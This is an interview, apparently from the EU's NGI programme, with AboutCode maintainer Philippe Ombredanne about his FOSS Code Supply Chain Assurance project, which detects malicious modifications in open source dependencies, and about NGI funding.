Philippe Ombredanne - FOSS Code Supply Chain Assurance
Mitigate attacks through software dependencies
Software engineering, protocols, cryptography
Can you introduce yourself and your project?
I'm Philippe Ombredanne and I'm on a mission to make it easier and safer to reuse FOSS code. I am the lead maintainer of AboutCode. We build best-in-class open source Software Composition Analysis (SCA) tools, open data, and community standards for open source discovery, licence, and security compliance.
FOSS Code Supply Chain Assurance mitigates attacks from malicious modifications of software dependencies in the open source package supply chain. This free and open source software (FOSS) project is building a new system to verify the integrity of deployed code packages and validate their origin with external data sources, such as detecting if a package in use matches verified or known code by mapping source and binaries exactly and approximately.
What are the key issues you see with the state of the internet today?
Security is the problem. The status quo of fast and easy communication and freely sharing private data means malicious cybersecurity attacks can cause more damage with the accessible data.
The internet was built, developed, and expanded thanks to free and open source software (FOSS). The explosion of FOSS usage across everything digital means it is very easy for developers to consume, provision, integrate and reuse FOSS. A sophisticated malware attack on FOSS can be disastrous for developers and users, companies and countries, industries and sectors, with several of these attacks, like the xz-utils backdoor, unleashing mayhem on business and society in recent years.
Securing all the FOSS packages reused is a critical issue with the current state of the internet today.
How does your project contribute to correcting some of those issues?
Software is built with components. Each and every software application includes FOSS components. This enabled – and continues to enable – software to eat the world because open source libraries and packages are easy to download and install – a programmer could install hundreds in seconds.
The difficulty is providing assurance that the downloaded components aren't viruses, malware, or trojans. Since there is little friction for consuming, downloading, and reusing FOSS, developers might not know exactly what those packages are – and that opens up potential for bad actors and malevolent attacks.
FOSS Code Supply Chain Assurance identifies what software is made of. The project scans code to observe and recognize distinguishing features, and then matches the code against databases of those features to identify outliers or red flags.
As a FOSS project to improve the security of FOSS packages, FOSS Code Supply Chain Assurance ensures that the different FOSS components used in various software are genuine.
What do you like most about (working on) your project?
There are many, many different ways to build software, like applications, operating systems, and libraries. We build tools for software developers to make it easier and safer to reuse FOSS code.
With a project like FOSS Code Supply Chain Assurance, we are proud to help others do the right thing. The best part about working on this project is being part of the vibrant open source community sharing feedback, values, and ideals.
Where will you take your project next?
Our goal is to build the best tools as free and open source software. We are working on automating more software composition analysis to improve the accuracy of the detected code origin and identify more injected scripts from malicious actors, and building apps to manage the process and mitigate the vulnerabilities uncovered.
We plan to continue to provide best-in-class reference data for software licences, packages, and vulnerabilities to build a true internet commons that can benefit everyone. With new regulations for software development around product liability and cybersecurity like the EU Cyber Resilience Act (CRA), the EU Product Liability Directive (PLD), and US Executive Order 14028, we need to ensure our tools can enable others to build software (and more FOSS) more efficiently with minimal friction from these regulations – all while improving their security posture.
How did NGI Assure help you reach your goals for your project?
NGI grants – and especially the one from NGI Assure – helped us realize our vision and develop our tools. These tools and standards are now used in almost every software organization across the world, and especially in Europe.
Cascade grants from NGI are essential support for open source innovation on software development to build a better and more open internet.
Do you have advice for people who are considering to apply for NGI funding?
NGI is a unique program to develop solutions. Your skills, competencies, knowledge, and passion to deliver open source are what matters, unlike traditional funding programs designed exclusively for researchers and academics.
My advice is to cultivate your passion and focus on innovation. And even if your submission is not accepted, the expert feedback is invaluable to continue developing your ideas and submit again for the next open call.
Do you have any recommendations to improve future NGI programmes or the wider NGI initiative?
Cascade funding with small grants is wonderful and extremely powerful. These small investments for big results reach a wider audience that don't always benefit from traditional grants. This has also proven to promote important open source initiatives.
With FOSS being free, the difficulty is sustained funding for sustained innovation. Software maintenance is not always exciting work, but it is essential for the long-term success of FOSS initiatives.
Larger, long-term grants for successful, responsible grantees will expand the impact of the initial deliverable and provide more support for long-term maintenance, visibility, and sustainability.
Acknowledgements
Image: courtesy of Philippe Ombredanne.
Published on September 17, 2024
FOSS Code Supply Chain Assurance received funding through the NGI Assure Fund, a fund established by NLnet with financial support from the European Commission's Next Generation Internet programme, under the aegis of DG Communications Networks, Content and Technology under grant agreement No 957073.